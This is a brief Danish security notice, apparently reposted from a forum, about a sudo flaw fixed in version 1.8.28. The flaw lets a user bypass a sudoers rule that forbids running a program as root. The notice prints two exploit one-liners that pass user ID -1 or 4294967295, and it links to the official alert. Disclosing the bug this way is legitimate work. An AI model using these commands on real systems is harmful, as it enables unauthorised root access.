En fejl i sudo tillader dig at eksekvere enhver eksekverbar fil som root, hvis /etc/sudoers tillader den at blive eksekveret af andre brugere og er forbudt for root.
Udnyttelsen af fejlen er meget enkel:
sudo -u#-1 id -u
eller:
sudo -u#4294967295 id -u
Fejlen er til stede i alle versioner af sudo før 1.8.28
Detaljer:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Kilde: linux.org.ru